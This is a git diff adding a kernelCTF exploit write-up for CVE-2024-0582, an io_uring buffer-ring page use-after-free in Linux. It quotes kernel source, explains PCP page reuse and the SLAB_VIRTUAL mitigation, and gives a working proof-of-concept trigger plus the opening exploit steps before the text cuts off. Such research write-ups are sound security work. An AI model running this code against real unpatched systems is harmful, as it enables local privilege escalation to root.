diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/exploit.md new file mode 100644 index 00000000..519ca276 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/exploit.md @@ -0,0 +1,1201 @@ +## Trigger the Vulnerability + +The `io_uring_register` syscall supports various registration ops to allow a user to register different resources that `io_uring` can use. Specifically, with `IORING_REGISTER_PBUF_RING` combined with the `IOU_PBUF_RING_MMAP` flag, the kernel allocates pages for an `io_buffer_list` and attaches it to the `io_ring_ctx` under a given `bgid`. + +```c +int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg) +{ + struct io_uring_buf_reg reg; + struct io_buffer_list *bl, *free_bl = NULL; + int ret; + + if (copy_from_user(®, arg, sizeof(reg))) + return -EFAULT; +/*...*/ + + if (!(reg.flags & IOU_PBUF_RING_MMAP)) + ret = io_pin_pbuf_ring(®, bl); + else + ret = io_alloc_pbuf_ring(®, bl); // <-- IOU_PBUF_RING_MMAP + + if (!ret) { + bl->nr_entries = reg.ring_entries; + bl->mask = reg.ring_entries - 1; + + io_buffer_add_list(ctx, bl, reg.bgid); // <-- add buffer_list to ctx with bgid + return 0; + } + + kfree(free_bl); + return ret; +} +``` + +In the `io_alloc_pbuf_ring()` function below, the kernel uses `__get_free_pages()` to allocate pages for the buffer ring: + +```c +static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg, + struct io_buffer_list *bl) +{ + gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP; + size_t ring_size; + void *ptr; + + ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring); + ptr = (void *) __get_free_pages(gfp, get_order(ring_size)); + if (!ptr) + return -ENOMEM; + + bl->buf_ring = ptr; + bl->is_mapped = 1; + bl->is_mmap = 1; + return 0; +} +``` + +Later, from userspace, one can request to mmap the buffer via a `vm_pgoff` that encodes both the `bgid` and `IORING_OFF_PBUF_RING`. + +The internal function `io_uring_validate_mmap_request()` checks which resource is being requested ({SQ, CQ} ring, SQEs, or pbuf ring) and returns the corresponding kernel virtual address: + +```c +static void *io_uring_validate_mmap_request(struct file *file, + loff_t pgoff, size_t sz) +{ + struct io_ring_ctx *ctx = file->private_data; + loff_t offset = pgoff << PAGE_SHIFT; + struct page *page; + void *ptr; + + if (ctx->flags & IORING_SETUP_NO_MMAP) + return ERR_PTR(-EINVAL); + + switch (offset & IORING_OFF_MMAP_MASK) { + case IORING_OFF_SQ_RING: + case IORING_OFF_CQ_RING: + ptr = ctx->rings; + break; + case IORING_OFF_SQES: + ptr = ctx->sq_sqes; + break; + case IORING_OFF_PBUF_RING: { + unsigned int bgid; + + bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT; + mutex_lock(&ctx->uring_lock); + ptr = io_pbuf_get_address(ctx, bgid); // <-- get registered buffer from ctx according to bgid + mutex_unlock(&ctx->uring_lock); + if (!ptr) + return ERR_PTR(-EINVAL); + break; + } + default: + return ERR_PTR(-EINVAL); + } + + page = virt_to_head_page(ptr); + if (sz > page_size(page)) + return ERR_PTR(-EINVAL); + + return ptr; +} +``` + +The call to `io_uring_validate_mmap_request()` returns the kernel’s base address of the buffer ring. Then `io_uring_mmap()` does: + +```c +static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma) +{ + size_t sz = vma->vm_end - vma->vm_start; + unsigned long pfn; + void *ptr; + + ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz); + if (IS_ERR(ptr)) + return PTR_ERR(ptr); + + pfn = virt_to_phys(ptr) >> PAGE_SHIFT; + return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot); +``` + +A user can unregister this buffer via `IORING_UNREGISTER_PBUF_RING`. Internally, the kernel will free the pages or unpin them accordingly. + +```c +int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg) +{ + struct io_uring_buf_reg reg; + struct io_buffer_list *bl; + + if (copy_from_user(®, arg, sizeof(reg))) + return -EFAULT; + if (reg.resv[0] || reg.resv[1] || reg.resv[2]) + return -EINVAL; + if (reg.flags) + return -EINVAL; + + bl = io_buffer_get_list(ctx, reg.bgid); // <-- get registered buffer_list from ctx according to bgid + if (!bl) + return -ENOENT; + if (!bl->is_mapped) + return -EINVAL; + + __io_remove_buffers(ctx, bl, -1U); // <-- remove buffer + if (bl->bgid >= BGID_ARRAY) { + xa_erase(&ctx->io_bl_xa, bl->bgid); + kfree(bl); + } + return 0; +} + +static int __io_remove_buffers(struct io_ring_ctx *ctx, + struct io_buffer_list *bl, unsigned nbufs) +{ + unsigned i = 0; + + /* shouldn't happen */ + if (!nbufs) + return 0; + + if (bl->is_mapped) { + i = bl->buf_ring->tail - bl->head; + if (bl->is_mmap) { + folio_put(virt_to_folio(bl->buf_ring)); // <-- refcount-- + bl->buf_ring = NULL; + bl->is_mmap = 0; + } else if (bl->buf_nr_pages) { + int j; + + for (j = 0; j < bl->buf_nr_pages; j++) + unpin_user_page(bl->buf_pages[j]); + kvfree(bl->buf_pages); + bl->buf_pages = NULL; + bl->buf_nr_pages = 0; + } + /* make sure it's seen as empty */ + INIT_LIST_HEAD(&bl->buf_list); + bl->is_mapped = 0; + return i; + } +/*...*/ +} +``` + +Notice the call to `folio_put(virt_to_folio(bl->buf_ring))`, which decrements the folio/page reference count. + +The vulnerability is that `remap_pfn_range()` is a lower-level API tha map a given physical address range into userspace creating `VM_PFNMAP` VMAs. `VM_PFNMAP` mappings are special, because unlike normal memory mappings, there is no lifetime information associated with the mapping - it is just a raw mapping of PFNs with no reference counting of a 'struct page'; therefore, the caller is responsible for holding references to the page as long as it is mapped into userspace. + +```c +static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma) +{ + size_t sz = vma->vm_end - vma->vm_start; + unsigned long pfn; + void *ptr; + + ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz); + if (IS_ERR(ptr)) + return PTR_ERR(ptr); + + pfn = virt_to_phys(ptr) >> PAGE_SHIFT; + return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot); +``` + +So if a user registers a buffer ring with `IORING_REGISTER_PBUF_RING`, `mmap()` it, and then frees it with `IORING_UNREGISTER_PBUF_RING`, the user will gain the ability to read or write already freed pages, it's a well-known universal root primitive. + +A poc taken from [Linux >=6.4: io_uring: page UAF via buffer ring mmap - Project Zero](https://project-zero.issues.chromium.org/issues/42451653): + +```c +#define _GNU_SOURCE +#include <err.h> +#include <linux/io_uring.h> +#include <stdio.h> +#include <string.h> +#include <sys/mman.h> +#include <sys/syscall.h> +#include <unistd.h> + +#define SYSCHK(x) ({ \ +typeof(x) __res = (x); \ +if (__res == (typeof(x))-1) \ +err(1, "SYSCHK(" #x ")"); \ +__res; \ +}) + +int main(void) { + struct io_uring_params params = {.flags = IORING_SETUP_NO_SQARRAY}; + int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, ¶ms)); + printf("uring_fd = %d\n", uring_fd); + + struct io_uring_buf_reg reg = { + .ring_entries = 1, .bgid = 0, .flags = IOU_PBUF_RING_MMAP}; + SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, + ®, 1)); + + void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, + MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING)); + printf("pbuf mapped at %p\n", pbuf_mapping); + + struct io_uring_buf_reg unreg = {.bgid = 0}; + SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, + &unreg, 1)); + while (1) { + memset(pbuf_mapping, 0xaa, 0x1000); + usleep(100000); + } +} +``` + +## Revisit of Page UAF + +Since page UAF is a very powerful primitive, exploit is quite easy and straightforward. Before we go ahead into the trivial exploit part, let's revisit how page UAF works, especially on kernelCTF's hardened mitigation instance. + +### PCP(per_cpu_pages) list & migratetype + +#### folio_put + +If a folio's reference count drops to zero, the memory will be released back to the page allocator and may be used by another allocation immediately. + +``` c +static inline void folio_put(struct folio *folio) +{ + if (folio_put_testzero(folio)) + __folio_put(folio); +} + +void __folio_put(struct folio *folio) +{ + if (unlikely(folio_is_zone_device(folio))) + free_zone_device_page(&folio->page); + else if (unlikely(folio_test_large(folio))) // <-- multi-page folio? + __folio_put_large(folio); + else + __folio_put_small(folio); +} +``` + +Normally, depending on the folio type, the call flows into either the single-page or multi-page release path: + +```c +// 👇 single page release path +static void __folio_put_small(struct folio *folio) +{ + __page_cache_release(folio); + mem_cgroup_uncharge(folio); + free_unref_page(&folio->page, 0); // <-- try free via pcp +} + +// 👇 multiple page release path +static void __folio_put_large(struct folio *folio) +{ + if (!folio_test_hugetlb(folio)) + __page_cache_release(folio); + destroy_large_folio(folio); +} + +void destroy_large_folio(struct folio *folio) +{ + if (folio_test_hugetlb(folio)) { + free_huge_folio(folio); + return; + } + + if (folio_test_large_rmappable(folio)) + folio_undo_large_rmappable(folio); + + mem_cgroup_uncharge(folio); + free_the_page(&folio->page, folio_order(folio)); +} +``` + +The function `free_the_page()` decides whether to place the pages into the PCP list or release them directly to the buddy allocator: + +```c +#define PAGE_ALLOC_COSTLY_ORDER 3 + +static inline bool pcp_allowed_order(unsigned int order) +{ + if (order <= PAGE_ALLOC_COSTLY_ORDER) + return true; +#ifdef CONFIG_TRANSPARENT_HUGEPAGE + if (order == pageblock_order) + return true; +#endif + return false; +} + +static inline void free_the_page(struct page *page, unsigned int order) +{ + if (pcp_allowed_order(order)) /* Via pcp? */ + free_unref_page(page, order); + else + __free_pages_ok(page, order, FPI_NONE); +} +``` + +If the released pages meet all of these conditions: + +- `migratetype < MIGRATE_PCPTYPES` +- `order <= PAGE_ALLOC_COSTLY_ORDER` +- `pcp->count` is below the `high` watermark + +then they are added to the `pcp->lists[pindex]`(where `pindex` is calculated through `order` and `migratetype`) rather than immediately being returned to the buddy allocator. + +This logic is handled in `free_unref_page()` and `free_unref_page_commit()`: + +```c +/* + * Free a pcp page + */ +void free_unref_page(struct page *page, unsigned int order) +{ + unsigned long __maybe_unused UP_flags; + struct per_cpu_pages *pcp; + struct zone *zone; + unsigned long pfn = page_to_pfn(page); + int migratetype, pcpmigratetype; + + if (!free_unref_page_prepare(page, pfn, order)) + return; + + migratetype = pcpmigratetype = get_pcppage_migratetype(page); + if (unlikely(migratetype >= MIGRATE_PCPTYPES)) { + if (unlikely(is_migrate_isolate(migratetype))) { + free_one_page(page_zone(page), page, pfn, order, migratetype, FPI_NONE); + return; + } + pcpmigratetype = MIGRATE_MOVABLE; + } + + zone = page_zone(page); + pcp_trylock_prepare(UP_flags); + pcp = pcp_spin_trylock(zone->per_cpu_pageset); + if (pcp) { + free_unref_page_commit(zone, pcp, page, pcpmigratetype, order); + pcp_spin_unlock(pcp); + } else { + free_one_page(zone, page, pfn, order, migratetype, FPI_NONE); + } + pcp_trylock_finish(UP_flags); +} + +static inline unsigned int order_to_pindex(int migratetype, int order) +{ +/*...*/ + return (MIGRATE_PCPTYPES * order) + migratetype; +} + +static void free_unref_page_commit(struct zone *zone, struct per_cpu_pages *pcp, + struct page *page, int migratetype, + unsigned int order) +{ + int high; + int pindex; + bool free_high; + + __count_vm_events(PGFREE, 1 << order); + pindex = order_to_pindex(migratetype, order); + // 👇 add to the pcp list + list_add(&page->pcp_list, &pcp->lists[pindex]); + pcp->count += 1 << order; + + free_high = (pcp->free_factor && order && order <= PAGE_ALLOC_COSTLY_ORDER); + + high = nr_pcp_high(pcp, zone, free_high); + if (pcp->count >= high) { + free_pcppages_bulk(zone, nr_pcp_free(pcp, high, free_high), pcp, pindex); + } +} +``` + +#### __alloc_pages + +When the kernel needs new pages, it calls `__alloc_pages()`, which then calls `get_page_from_freelist()`. Internally, the allocation logic tries to grab pages from the PCP list first (via `rmqueue_pcplist()`): + +```c +/* + * This is the 'heart' of the zoned buddy allocator. + */ +struct page *__alloc_pages(gfp_t gfp, unsigned int order, int preferred_nid, + nodemask_t *nodemask) +{ +/*...*/ + /* First allocation attempt */ + page = get_page_from_freelist(alloc_gfp, order, alloc_flags, &ac); + if (likely(page)) + goto out; + +/*...*/ + return page; +} + + +``` + +Inside `get_page_from_freelist()` and `rmqueue()`: + +```c +/* + * get_page_from_freelist goes through the zonelist trying to allocate + * a page. + */ +static struct page * +get_page_from_freelist(gfp_t gfp_mask, unsigned int order, int alloc_flags, + const struct alloc_context *ac) +{ + struct zoneref *z; + struct zone *zone; + struct pglist_data *last_pgdat = NULL; + bool last_pgdat_dirty_ok = false; + bool no_fallback; + +/*...*/ + +try_this_zone: + page = rmqueue(ac->preferred_zoneref->zone, zone, order, + gfp_mask, alloc_flags, ac->migratetype); + if (page) { + prep_new_page(page, order, gfp_mask, alloc_flags); + if (unlikely(alloc_flags & ALLOC_HIGHATOMIC)) + reserve_highatomic_pageblock(page, zone); + return page; + } +/*...*/ + + return NULL; +} + +__no_sanitize_memory +static inline +struct page *rmqueue(struct zone *preferred_zone, + struct zone *zone, unsigned int order, + gfp_t gfp_flags, unsigned int alloc_flags, + int migratetype) +{ + struct page *page; + + WARN_ON_ONCE((gfp_flags & __GFP_NOFAIL) && (order > 1)); + + if (likely(pcp_allowed_order(order))) { // <-- order <= PAGE_ALLOC_COSTLY_ORDER + page = rmqueue_pcplist(preferred_zone, zone, order, + migratetype, alloc_flags); + if (likely(page)) + goto out; + } + +/*...*/ + + VM_BUG_ON_PAGE(page && bad_range(zone, page), page); + return page; +} +``` + +The routine `rmqueue_pcplist()` attempts to remove pages from the relevant PCP list (matching `order` and `migratetype`), and return them immediately. If it cannot find suitable pages, it falls back to the buddy free list. + +```c +/* Lock and remove page from the per-cpu list */ +static struct page *rmqueue_pcplist(struct zone *preferred_zone, + struct zone *zone, unsigned int order, + int migratetype, unsigned int alloc_flags) +{ + struct per_cpu_pages *pcp; + struct list_head *list; + struct page *page; + unsigned long __maybe_unused UP_flags; + + /* spin_trylock may fail due to a parallel drain or IRQ reentrancy. */ + pcp_trylock_prepare(UP_flags); + pcp = pcp_spin_trylock(zone->per_cpu_pageset); + if (!pcp) { + pcp_trylock_finish(UP_flags); + return NULL; + } + + pcp->free_factor >>= 1; + list = &pcp->lists[order_to_pindex(migratetype, order)]; + page = __rmqueue_pcplist(zone, order, migratetype, alloc_flags, pcp, list); + pcp_spin_unlock(pcp); + pcp_trylock_finish(UP_flags); + if (page) { + __count_zid_vm_events(PGALLOC, page_zonenum(page), 1 << order); + zone_statistics(preferred_zone, zone, 1); + } + return page; +} +``` + +### Notes on SLAB_VIRTUAL + +The document of `SLAB_VIRTUAL` can be checked at [self-protection.rst](https://github.com/thejh/linux/blob/slub-virtual-v6.6/Documentation/security/self-protection.rst). + +The `SLAB_VIRTUAL` mitigation focuses on preventing slab virtual address reuse by reserving a region of virtual memory for the slab allocator. And when `SLAB_VIRTUAL` is enabled, the slab's lifetime is not associated with slab pages anymore. + +#### `SLAB_VIRTUAL` disabled: + +##### allocate_slab + +Inside `alloc_slab_page()`: When we try to allocate a new slab, we are actually trying to get pages from buddy allocator, and later we call these pages we got `slab`. + +```c +static inline struct slab *alloc_slab_page(struct kmem_cache *s, + gfp_t meta_flags, gfp_t flags, int node, + struct kmem_cache_order_objects oo) +{ + struct folio *folio; + struct slab *slab; + unsigned int order; + + if (slab_virtual_enabled()) // <-- disabled now + return alloc_slab_page_virtual(s, meta_flags, flags, node, oo); + // <-- We enter the code below + order = oo_order(oo); + + if (node == NUMA_NO_NODE) + folio = (struct folio *)alloc_pages(flags, order); + else + folio = (struct folio *)__alloc_pages_node(node, flags, order); + + if (!folio) + return NULL; + + slab = folio_slab(folio); + folio_set_slab(folio, slab); + + return slab; +} +``` + +As the comment against `folio_slab` says: struct slab is a different representation of a `folio` (A `folio` is a way of representing a set of physically contiguous base pages). + +```c +/** + * folio_slab - Converts from folio to slab. + * @folio: The folio. + * + * Currently struct slab is a different representation of a folio where + * folio_test_slab() is true. + * + * Return: The slab which contains this folio. + */ +#define folio_slab(folio) (_Generic((folio), \ + const struct folio *: (const struct slab *)(folio), \ + struct folio *: (struct slab *)(folio))) + +/** + * slab_folio - The folio allocated for a slab + * @slab: The slab. + * + * Slabs are allocated as folios that contain the individual objects and are + * using some fields in the first struct page of the folio - those fields are + * now accessed by struct slab. It is occasionally necessary to convert back to + * a folio in order to communicate with the rest of the mm. Please use this + * helper function instead of casting yourself, as the implementation may change + * in the future. + */ +#define slab_folio(s) (_Generic((s), \ + const struct slab *: (slab_virtual_enabled() ? s->backing_folio : (const struct folio *)s), \ + struct slab *: (slab_virtual_enabled() ? s->backing_folio : (struct folio *)s))) +``` + +##### free_slab + +When a slab is going to be freed inside `__free_slab`: + +```c +static void __free_slab(struct kmem_cache *s, struct slab *slab) +{ + struct folio *folio; + int order; + int pages; + + if (slab_virtual_enabled()) { // <-- disabled now + __free_slab_virtual(s, (struct virtual_slab *)slab); + return; + } + + folio = slab_folio(slab); + order = folio_order(folio); + pages = 1 << order; + + folio_clear_slab(folio, slab); + mm_account_reclaimed_pages(pages); + unaccount_slab(slab, order, s); + __free_pages(&folio->page, order); +} +``` + +The slab's pages will also be freed and returned to buddy allocator. + +And if a attacker managed to return the slab to buddy allocator and allocate them back as a new slab(whose belonging `kmem_cache` can be different from previous one), the attacker managed to perform a `cross-cache` attack. + +#### `SLAB_VIRTUAL` enabled: + +##### allocate_slab + +Everything changes when `SLAB_VIRTUAL` is enabled: + +```c +static inline struct slab *alloc_slab_page(struct kmem_cache *s, + gfp_t meta_flags, gfp_t flags, int node, + struct kmem_cache_order_objects oo) +{ + struct folio *folio; + struct slab *slab; + unsigned int order; + + if (slab_virtual_enabled()) // <-- enabled now + // 👇 We directly return here + return alloc_slab_page_virtual(s, meta_flags, flags, node, oo); + /*...*/ +} +``` + +The `slab` (which actually we should call it `virtual_slab` now) is not simply a equality of `folio` anymore. When the kernel try to allocate a new `virtual_slab`, the `virtual_slab` will be located on `SLUB virtual memory` instead of `virtual memory map (vmemmap_base)`. And the `virtual_slab` is now consist of two parts --- `meta` and `data`. The `alloc_slab_meta()` function reserve a range of virtual address space for both of them: + +```c +/* + * Reserve a range of virtual address space, ensure that we have page tables for + * it, and allocate a corresponding struct slab. + * This is cold code, we don't really have to worry about performance here. + */ +static struct virtual_slab *alloc_slab_meta(unsigned int order, gfp_t gfp_flags) +{ + unsigned long alloc_size = PAGE_SIZE << order; + unsigned long flags; + unsigned long old_base; + unsigned long data_range_start, data_range_end; + unsigned long meta_range_start, meta_range_end; + unsigned long addr; + struct virtual_slab *slab, *sp; + bool valid_start, valid_end; + + gfp_flags &= (__GFP_HIGH | __GFP_RECLAIM | __GFP_IO | + __GFP_FS | __GFP_NOWARN | __GFP_RETRY_MAYFAIL | + __GFP_NOFAIL | __GFP_NORETRY | __GFP_MEMALLOC | + __GFP_NOMEMALLOC); + /* New page tables and metadata pages should be zeroed */ + gfp_flags |= __GFP_ZERO; + + slub_valloc_lock(flags); +retry_locked: + old_base = slub_addr_current; + + /* + * We drop the lock. The following code might sleep during + * page table allocation. Any mutations we make before rechecking + * slub_addr_current are idempotent, so that's fine. + */ + slub_valloc_unlock(flags); + + /* + * [data_range_start, data_range_end) is the virtual address range where + * this slab's objects will be mapped. + * We want alignment appropriate for the order. Note that this could be + * relaxed based on the alignment requirements of the objects being + * allocated, but for now, we behave like the page allocator would. + */ + data_range_start = ALIGN(old_base + slub_virtual_guard_size, alloc_size); + data_range_end = data_range_start + alloc_size; + + valid_start = data_range_start >= SLAB_DATA_BASE_ADDR && + IS_ALIGNED(data_range_start, PAGE_SIZE); + valid_end = data_range_end >= SLAB_DATA_BASE_ADDR && + IS_ALIGNED(data_range_end, PAGE_SIZE); + if (CHECK_DATA_CORRUPTION(!valid_start, + "invalid slab data range start") || + CHECK_DATA_CORRUPTION(!valid_end, + "invalid slab data range end")) + return NULL; + + /* We ran out of virtual memory for slabs */ + if (WARN_ON_ONCE(data_range_start >= SLAB_END_ADDR || + data_range_end >= SLAB_END_ADDR)) + return NULL; + + /* + * [meta_range_start, meta_range_end) is the range where the struct + * slabs for the current data range are mapped. The first struct slab, + * located at meta_range_start is the head slab that contains the actual + * data, all other struct slabs in the range point to the head slab. + */ + meta_range_start = virt_to_slab_virtual_raw(data_range_start); + meta_range_end = virt_to_slab_virtual_raw(data_range_end); + + /* Ensure the meta range is mapped. */ + for (addr = ALIGN_DOWN(meta_range_start, PAGE_SIZE); + addr < meta_range_end; addr += PAGE_SIZE) { + pte_t *ptep = slub_get_ptep(addr, gfp_flags, true); + + if (ptep == NULL) + return NULL; + + slub_valloc_lock(flags); + if (pte_none(READ_ONCE(*ptep))) { + struct page *meta_page; + + slub_valloc_unlock(flags); + meta_page = alloc_page(gfp_flags); + if (meta_page == NULL) + return NULL; + slub_valloc_lock(flags); + + /* Make sure that no one else has already mapped that page */ + if (pte_none(READ_ONCE(*ptep))) + set_pte_safe(ptep, + mk_pte(meta_page, PAGE_KERNEL)); + else + __free_page(meta_page); + } + slub_valloc_unlock(flags); + } + + /* Ensure we have page tables for the data range. */ + for (addr = data_range_start; addr < data_range_end; + addr += PAGE_SIZE) { + pte_t *ptep = slub_get_ptep(addr, gfp_flags, true); + + if (ptep == NULL) + return NULL; + } + + /* Did we race with someone else who made forward progress? */ + slub_valloc_lock(flags); + if (old_base != slub_addr_current) + goto retry_locked; + + /* Success! Grab the range for ourselves. */ + slub_addr_current = data_range_end; + slub_valloc_unlock(flags); + + slab = (struct virtual_slab *)meta_range_start; + spin_lock_init(&slab->slab.slab_lock); + + /* Initialize basic slub metadata for virt_to_slab() */ + for (sp = slab; (unsigned long)sp < meta_range_end; sp++) + sp->compound_slab_head = slab; + + return slab; +} + +static struct virtual_slab *get_free_slab(struct kmem_cache *s, + struct kmem_cache_order_objects oo, gfp_t meta_gfp_flags, + struct list_head *freed_slabs) +{ + unsigned long flags; + struct virtual_slab *slab; + +/*...*/ + spin_unlock_irqrestore(&s->virtual.freed_slabs_lock, flags); + slab = alloc_slab_meta(oo_order(oo), meta_gfp_flags); + if (slab == NULL) + return NULL; +/*...*/ + return slab; +} +``` + +After the kernel gets the `virtual_slab`, it will get pages from buddy allocator, but this time these pages are used as so-called `backing_folio` of `virtual_slab`. + +```c +static inline void folio_set_slab(struct folio *folio, struct slab *slab) +{ + __folio_set_slab(folio); + /* Make the flag visible before any changes to folio->mapping */ + smp_wmb(); + + if (slab_virtual_enabled()) + slab->backing_folio = folio; + + if (folio_is_pfmemalloc(folio)) + slab_set_pfmemalloc(slab); +} + +static struct slab *alloc_slab_page_virtual(struct kmem_cache *s, + gfp_t meta_gfp_flags, gfp_t gfp_flags, int node, + struct kmem_cache_order_objects oo) +{ + struct folio *folio; + struct virtual_slab *slab; + unsigned int order = oo_order(oo); + unsigned long flags; + void *virt_mapping; + pte_t *ptep; + struct list_head *freed_slabs; + + if (order == oo_order(s->min)) + freed_slabs = &s->virtual.freed_slabs_min; + else + freed_slabs = &s->virtual.freed_slabs; + + slab = get_free_slab(s, oo, meta_gfp_flags, freed_slabs); + if (!slab) + return NULL; + + /* + * Avoid making UAF reads easily exploitable by repopulating + * with pages containing attacker-controller data - always zero + * pages. + */ + gfp_flags |= __GFP_ZERO; + if (node == NUMA_NO_NODE) + folio = (struct folio *)alloc_pages(gfp_flags, order); + else + folio = (struct folio *)__alloc_pages_node(node, gfp_flags, + order); + + if (!folio) { + /* Rollback: put the struct slab back. */ + spin_lock_irqsave(&s->virtual.freed_slabs_lock, flags); + list_add(&slab->slab.slab_list, freed_slabs); + WRITE_ONCE(s->virtual.nr_freed_pages, + s->virtual.nr_freed_pages + (1UL << slab_order(&slab->slab))); + spin_unlock_irqrestore(&s->virtual.freed_slabs_lock, flags); + + return NULL; + } + folio_set_slab(folio, (struct slab *)slab); + + slab->slab.oo = oo; + + virt_mapping = slab_to_virt(slab); + + /* Wire up physical folio */ + for (unsigned long i = 0; i < (1UL << oo_order(oo)); i++) { + ptep = slub_get_ptep( + (unsigned long)virt_mapping + i * PAGE_SIZE, 0, false); + if (CHECK_DATA_CORRUPTION(pte_present(*ptep), + "slab PTE already present")) + return NULL; + set_pte_safe(ptep, mk_pte(folio_page(folio, i), PAGE_KERNEL)); + } + + return (struct slab *)slab; +} +``` + +And the kernel set up ptes between `virt_mapping`(`data` of a `virtual_slab`) and physical pages of the `backing_folio` before completing the allocation. + +##### free_slab + +When `SLAB_VIRTUAL` is enabled and the kernel is going to free a `virtual_slab`, the `virtual_slab` won't be returned back to buddy allocator now.(after all it's not allocated from buddy allocator anymore : >) + +```c +static void __free_slab(struct kmem_cache *s, struct slab *slab) +{ + struct folio *folio; + int order; + int pages; + + if (slab_virtual_enabled()) { // <-- enabled now + __free_slab_virtual(s, (struct virtual_slab *)slab); + // 👇 return directly here + return; + } + + /*...*/ +} +``` + +Instead the kernel clears the ptes between `virt_mapping` and physical pages of the `backing_folio`: + +```c +static void __free_slab_virtual(struct kmem_cache *s, struct virtual_slab *slab) +{ + int order = oo_order(slab->slab.oo); + unsigned long pages = 1UL << order; + unsigned long slab_base = (unsigned long)slab_address(&slab->slab); + + /* Clear the PTEs for the slab we're freeing */ + for (unsigned long i = 0; i < pages; i++) { + unsigned long addr = slab_base + i * PAGE_SIZE; + pte_t *ptep = slub_get_ptep(addr, 0, false); + + if (CHECK_DATA_CORRUPTION(!pte_present(*ptep), + "slab PTE already clear")) + return; + + ptep_clear(&init_mm, addr, ptep); + } + + mm_account_reclaimed_pages(pages); + unaccount_slab(&slab->slab, order, s); + + /* + * We might not be able to a TLB flush here (e.g. hardware interrupt + * handlers) so instead we give the slab to the TLB flusher thread + * which will flush the TLB for us and only then free the physical + * memory. + */ + queue_slab_tlb_flush(slab); +} +``` + +Later the kernel submit the `virtual_slab` to `slub_tlbflush_worker`, return the physical pages of the `backing_folio` to buddy allocator after flushing the TLB: + +```c +static void slub_tlbflush_worker(struct kthread_work *work) +{ + unsigned long irq_flags; + LIST_HEAD(local_queue); + struct virtual_slab *slab, *tmp; + unsigned long addr_start = ULONG_MAX; + unsigned long addr_end = 0; + + spin_lock_irqsave(&slub_kworker_lock, irq_flags); + list_splice_init(&slub_tlbflush_queue, &local_queue); + list_for_each_entry(slab, &local_queue, slab.slab_list) { + unsigned long start = (unsigned long)slab_to_virt(slab); + unsigned long end = start + PAGE_SIZE * + (1UL << oo_order(slab->slab.oo)); + + if (start < addr_start) + addr_start = start; + if (end > addr_end) + addr_end = end; + } + spin_unlock_irqrestore(&slub_kworker_lock, irq_flags); + + if (addr_start < addr_end) + flush_tlb_kernel_range(addr_start, addr_end); + + spin_lock_irqsave(&slub_kworker_lock, irq_flags); + list_for_each_entry_safe(slab, tmp, &local_queue, slab.slab_list) { + struct folio *folio = slab->slab.backing_folio; + struct kmem_cache *s = slab->slab.slab_cache; + + list_del(&slab->slab.slab_list); + folio_clear_slab(folio, &slab->slab); + __free_pages(folio_page(folio, 0), oo_order(slab->slab.oo)); + + /* IRQs are already off */ + spin_lock(&s->virtual.freed_slabs_lock); + if (oo_order(slab->slab.oo) == oo_order(s->min)) { + list_add(&slab->slab.slab_list, &s->virtual.freed_slabs_min); + } else { + WARN_ON(oo_order(slab->slab.oo) != oo_order(s->oo)); + list_add(&slab->slab.slab_list, &s->virtual.freed_slabs); + } + WRITE_ONCE(s->virtual.nr_freed_pages, s->virtual.nr_freed_pages + + (1UL << slab_order(&slab->slab))); + spin_unlock(&s->virtual.freed_slabs_lock); + } + spin_unlock_irqrestore(&slub_kworker_lock, irq_flags); +} +``` + +As we can see, the freed `virtual_slab` will go to the `virtual.freed_slabs{_min}` of its belonging `kmem_cache` while keeping its `virtual address space`.That's why `SLAB_VIRTUAL` prevents `cross-cache` attack efficiently. + +### Why Page UAF works + +Now it's not hard to get several conclusions: + +- Objects/pages directly allocated from buddy allocator are not protected by `SLAB_VIRTUAL`(true as its name implies). The same range of virtual address can be reused by different objects/pages once the appropriate pages are freed and returned to buddy allocator. +- When a `virtual_slab` is allocated/reused, it will allocate pages from buddy allocator as `backing_folio` and set up ptes between `virt_mapping` and physical pages of `backing_folio`. +- Normally “same order and same migratetype” pages get stored in the PCP list, which allows them to be quickly reused. + +The above is the basic logic of how page UAF (still) works on Google's kernelCTF mitigation instance. + +## Exploit Details + +Pin cpu to a certain core to increase the exploit stability as later we need to play with PCP list: + +```c +static void pin_cpu(int cpu_n, pid_t pid) { + cpu_set_t set; + + CPU_ZERO(&set); + CPU_SET(cpu_n, &set); + + if (sched_setaffinity(pid, sizeof(set), &set) < 0) { + die("sched_setaffinity: %m"); + } +} + +pin_cpu(0, getpid()); +``` + +Setup io_uring: + +```c + struct io_uring_params params = {.flags = IORING_SETUP_NO_SQARRAY}; + int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, ¶ms)); +``` + +Spray pbuf and mmap buffer in order to create multiple single-page UAFs at the same time to increase the exploit stability: + +```c + for (int i = 0; i < SPRAY_PBUF_NUM; i++) { + struct io_uring_buf_reg reg = { + .ring_entries = 1, .bgid = i, .flags = IOU_PBUF_RING_MMAP}; + SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, + ®, 1)); + + pbuf_mappings[i] = + SYSCHK(mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, + IORING_OFF_PBUF_RING + (i << IORING_OFF_PBUF_SHIFT))); + logi("[pbuf %d] mapped at %p", i, pbuf_mappings[i]); + } +``` + +Trigger page UAF: + +```c + for (int i = 0; i < SPRAY_PBUF_NUM; i++) { + struct io_uring_buf_reg unreg = 